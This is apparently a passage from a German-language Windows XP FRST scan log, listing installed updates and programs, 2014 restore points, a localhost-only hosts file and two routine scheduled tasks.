Sicherheitsupdate für Windows XP (KB2423089) (HKLM\...\KB2423089) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2436673) (HKLM\...\KB2436673) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2440591) (HKLM\...\KB2440591) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2443105) (HKLM\...\KB2443105) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2476490) (HKLM\...\KB2476490) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2476687) (HKLM\...\KB2476687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2478960) (HKLM\...\KB2478960) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2478971) (HKLM\...\KB2478971) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2479628) (HKLM\...\KB2479628) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2479943) (HKLM\...\KB2479943) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2481109) (HKLM\...\KB2481109) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2483185) (HKLM\...\KB2483185) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2485376) (HKLM\...\KB2485376) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2485663) (HKLM\...\KB2485663) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2491683) (HKLM\...\KB2491683) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2503658) (HKLM\...\KB2503658) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2503665) (HKLM\...\KB2503665) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2506212) (HKLM\...\KB2506212) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2506223) (HKLM\...\KB2506223) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2507618) (HKLM\...\KB2507618) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2507938) (HKLM\...\KB2507938) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2508272) (HKLM\...\KB2508272) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2508429) (HKLM\...\KB2508429) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2509553) (HKLM\...\KB2509553) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2511455) (HKLM\...\KB2511455) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2524375) (HKLM\...\KB2524375) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2535512) (HKLM\...\KB2535512) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2536276) (HKLM\...\KB2536276) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2536276-v2) (HKLM\...\KB2536276-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2544893) (HKLM\...\KB2544893) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2544893-v2) (HKLM\...\KB2544893-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2555917) (HKLM\...\KB2555917) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2562937) (HKLM\...\KB2562937) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2566454) (HKLM\...\KB2566454) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2567053) (HKLM\...\KB2567053) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2567680) (HKLM\...\KB2567680) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2570222) (HKLM\...\KB2570222) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2570947) (HKLM\...\KB2570947) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2584146) (HKLM\...\KB2584146) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2585542) (HKLM\...\KB2585542) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2592799) (HKLM\...\KB2592799) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2598479) (HKLM\...\KB2598479) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2603381) (HKLM\...\KB2603381) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2618451) (HKLM\...\KB2618451) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2619339) (HKLM\...\KB2619339) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2620712) (HKLM\...\KB2620712) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2621440) (HKLM\...\KB2621440) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2624667) (HKLM\...\KB2624667) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2631813) (HKLM\...\KB2631813) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2633171) (HKLM\...\KB2633171) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2639417) (HKLM\...\KB2639417) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2641653) (HKLM\...\KB2641653) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2646524) (HKLM\...\KB2646524) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2647518) (HKLM\...\KB2647518) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2653956) (HKLM\...\KB2653956) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2655992) (HKLM\...\KB2655992) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2659262) (HKLM\...\KB2659262) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2660465) (HKLM\...\KB2660465) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2661637) (HKLM\...\KB2661637) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2676562) (HKLM\...\KB2676562) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2685939) (HKLM\...\KB2685939) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2686509) (HKLM\...\KB2686509) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2691442) (HKLM\...\KB2691442) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2695962) (HKLM\...\KB2695962) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2698365) (HKLM\...\KB2698365) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2705219) (HKLM\...\KB2705219) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2707511) (HKLM\...\KB2707511) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2709162) (HKLM\...\KB2709162) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2712808) (HKLM\...\KB2712808) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2718523) (HKLM\...\KB2718523) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2719985) (HKLM\...\KB2719985) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2723135) (HKLM\...\KB2723135) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2724197) (HKLM\...\KB2724197) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2727528) (HKLM\...\KB2727528) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2731847) (HKLM\...\KB2731847) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2753842) (HKLM\...\KB2753842) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2753842-v2) (HKLM\...\KB2753842-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2757638) (HKLM\...\KB2757638) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2758857) (HKLM\...\KB2758857) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2761226) (HKLM\...\KB2761226) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2770660) (HKLM\...\KB2770660) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2779030) (HKLM\...\KB2779030) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2780091) (HKLM\...\KB2780091) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2802968) (HKLM\...\KB2802968) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2807986) (HKLM\...\KB2807986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2808735) (HKLM\...\KB2808735) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2813170) (HKLM\...\KB2813170) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2813345) (HKLM\...\KB2813345) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2820197) (HKLM\...\KB2820197) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2820917) (HKLM\...\KB2820917) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2829361) (HKLM\...\KB2829361) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2834886) (HKLM\...\KB2834886) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2839229) (HKLM\...\KB2839229) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2845187) (HKLM\...\KB2845187) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2847311) (HKLM\...\KB2847311) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2849470) (HKLM\...\KB2849470) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2850851) (HKLM\...\KB2850851) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2850869) (HKLM\...\KB2850869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2859537) (HKLM\...\KB2859537) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862152) (HKLM\...\KB2862152) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862330) (HKLM\...\KB2862330) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862335) (HKLM\...\KB2862335) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2864063) (HKLM\...\KB2864063) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2868038) (HKLM\...\KB2868038) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2868626) (HKLM\...\KB2868626) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876217) (HKLM\...\KB2876217) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876315) (HKLM\...\KB2876315) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876331) (HKLM\...\KB2876331) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2883150) (HKLM\...\KB2883150) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2892075) (HKLM\...\KB2892075) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2893294) (HKLM\...\KB2893294) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2893984) (HKLM\...\KB2893984) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2898715) (HKLM\...\KB2898715) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2900986) (HKLM\...\KB2900986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2914368) (HKLM\...\KB2914368) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2916036) (HKLM\...\KB2916036) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2922229) (HKLM\...\KB2922229) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2929961) (HKLM\...\KB2929961) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2930275) (HKLM\...\KB2930275) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923561) (HKLM\...\KB923561) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923689) (HKLM\...\KB923689) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB938464) (HKLM\...\KB938464) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB941569) (HKLM\...\KB941569) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB946648) (HKLM\...\KB946648) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950760) (HKLM\...\KB950760) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950762) (HKLM\...\KB950762) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950974) (HKLM\...\KB950974) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951066) (HKLM\...\KB951066) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951376) (HKLM\...\KB951376) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951376-v2) (HKLM\...\KB951376-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951698) (HKLM\...\KB951698) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951748) (HKLM\...\KB951748) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB952004) (HKLM\...\KB952004) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB952954) (HKLM\...\KB952954) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB953839) (HKLM\...\KB953839) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB954211) (HKLM\...\KB954211) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB954459) (HKLM\...\KB954459) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB954600) (HKLM\...\KB954600) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB955069) (HKLM\...\KB955069) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956391) (HKLM\...\KB956391) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956572) (HKLM\...\KB956572) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956744) (HKLM\...\KB956744) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956802) (HKLM\...\KB956802) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956803) (HKLM\...\KB956803) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956841) (HKLM\...\KB956841) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956844) (HKLM\...\KB956844) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB957095) (HKLM\...\KB957095) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB957097) (HKLM\...\KB957097) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB958644) (HKLM\...\KB958644) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB958687) (HKLM\...\KB958687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB958690) (HKLM\...\KB958690) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB958869) (HKLM\...\KB958869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB959426) (HKLM\...\KB959426) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960225) (HKLM\...\KB960225) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960715) (HKLM\...\KB960715) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960803) (HKLM\...\KB960803) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960859) (HKLM\...\KB960859) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB961371) (HKLM\...\KB961371) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB961373) (HKLM\...\KB961373) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB961501) (HKLM\...\KB961501) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB968537) (HKLM\...\KB968537) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB969059) (HKLM\...\KB969059) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB969898) (HKLM\...\KB969898) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB969947) (HKLM\...\KB969947) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB970238) (HKLM\...\KB970238) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB970430) (HKLM\...\KB970430) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971468) (HKLM\...\KB971468) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971486) (HKLM\...\KB971486) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971557) (HKLM\...\KB971557) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971633) (HKLM\...\KB971633) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971657) (HKLM\...\KB971657) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971961) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB972270) (HKLM\...\KB972270) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973346) (HKLM\...\KB973346) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973354) (HKLM\...\KB973354) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973507) (HKLM\...\KB973507) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973525) (HKLM\...\KB973525) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973869) (HKLM\...\KB973869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973904) (HKLM\...\KB973904) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974112) (HKLM\...\KB974112) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974318) (HKLM\...\KB974318) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974392) (HKLM\...\KB974392) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974571) (HKLM\...\KB974571) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975025) (HKLM\...\KB975025) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975467) (HKLM\...\KB975467) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975560) (HKLM\...\KB975560) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975561) (HKLM\...\KB975561) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975562) (HKLM\...\KB975562) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975713) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB977165) (HKLM\...\KB977165) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB977816) (HKLM\...\KB977816) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB977914) (HKLM\...\KB977914) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978037) (HKLM\...\KB978037) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978251) (HKLM\...\KB978251) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978262) (HKLM\...\KB978262) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978338) (HKLM\...\KB978338) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978542) (HKLM\...\KB978542) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978601) (HKLM\...\KB978601) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978706) (HKLM\...\KB978706) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979309) (HKLM\...\KB979309) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979482) (HKLM\...\KB979482) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979559) (HKLM\...\KB979559) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979683) (HKLM\...\KB979683) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979687) (HKLM\...\KB979687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980195) (HKLM\...\KB980195) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980218) (HKLM\...\KB980218) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980232) (HKLM\...\KB980232) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980436) (HKLM\...\KB980436) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981322) (HKLM\...\KB981322) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981349) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB981852) (HKLM\...\KB981852) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981957) (HKLM\...\KB981957) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981997) (HKLM\...\KB981997) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982132) (HKLM\...\KB982132) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982214) (HKLM\...\KB982214) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982665) (HKLM\...\KB982665) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982802) (HKLM\...\KB982802) (Version: 1 - Microsoft Corporation)
Smart Link 56K Modem (HKLM\...\SLAMRNTV) (Version:  - )
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 7.10.10.0 - )
TeamViewer 9 (HKLM\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
Update für Windows Internet Explorer 7 (KB976749) (Version: 1 - Microsoft Corporation) Hidden
Update für Windows Internet Explorer 7 (KB980182) (Version: 1 - Microsoft Corporation) Hidden
Update für Windows Internet Explorer 8 (KB2447568) (HKLM\...\KB2447568-IE8) (Version: 1 - Microsoft Corporation)
Update für Windows Internet Explorer 8 (KB976662) (HKLM\...\KB976662-IE8) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2616676-v2) (HKLM\...\KB2616676-v2) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2661254-v2) (HKLM\...\KB2661254-v2) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB2718704) (HKLM\...\KB2718704) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2736233) (HKLM\...\KB2736233) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2863058) (HKLM\...\KB2863058) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2934207) (HKLM\...\KB2934207) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB951072-v2) (HKLM\...\KB951072-v2) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update für Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
USBGrabberDrv (HKLM\...\{E34CEAA5-9537-4CCB-A54F-DB0D8F15EA80}) (Version: 1.00.0000 - NEWMI)
VIA Audio Driver Setup Program (HKLM\...\VIA Audio Driver Setup Program) (Version:  - )
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Wichtiges Update für Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version:  - Microsoft Corporation)
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.7.0017.0 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031514 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points  =========================

14-08-2014 16:27:48 Systemprüfpunkt
14-08-2014 17:50:02 Software Distribution Service 3.0
26-08-2014 17:54:21 Systemprüfpunkt
03-09-2014 16:48:55 Systemprüfpunkt
07-09-2014 15:25:54 Systemprüfpunkt
09-09-2014 12:29:10 Systemprüfpunkt
12-09-2014 06:25:02 Software Distribution Service 3.0
14-09-2014 11:03:11 Systemprüfpunkt
20-09-2014 11:39:53 Systemprüfpunkt
22-09-2014 07:08:12 Systemprüfpunkt
23-09-2014 10:59:44 Systemprüfpunkt
24-09-2014 11:09:15 Systemprüfpunkt
27-09-2014 17:35:41 Systemprüfpunkt
29-09-2014 17:27:06 Systemprüfpunkt
05-10-2014 14:54:20 Systemprüfpunkt
07-10-2014 15:17:38 Systemprüfpunkt
08-10-2014 15:35:41 Systemprüfpunkt
12-10-2014 16:52:39 Systemprüfpunkt
15-10-2014 19:52:42 Software Distribution Service 3.0
19-10-2014 15:44:41 Systemprüfpunkt
20-10-2014 17:34:10 Java 7 Update 71 wird installiert
23-10-2014 12:04:06 Systemprüfpunkt
26-10-2014 19:05:48 Systemprüfpunkt
27-10-2014 19:29:09 Systemprüfpunkt
31-10-2014 20:15:17 Systemprüfpunkt
02-11-2014 17:08:12 Systemprüfpunkt
05-11-2014 16:50:18 Systemprüfpunkt
06-11-2014 17:35:16 Systemprüfpunkt
09-11-2014 17:08:13 Systemprüfpunkt
11-11-2014 18:41:23 Systemprüfpunkt

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2004-11-17 01:33 - 2006-01-31 07:52 - 00000847 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost
127.0.0.1       localhost


==================== Scheduled Tasks (whitelisted) =============


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP –  Benachrichtigung – Anmeldung.job => C:\WINDOWS\system32\xp_eos.exe
